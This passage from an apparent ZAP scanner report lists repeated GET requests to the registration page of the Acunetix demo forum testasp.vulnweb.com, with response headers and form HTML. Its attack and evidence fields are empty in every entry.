InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> 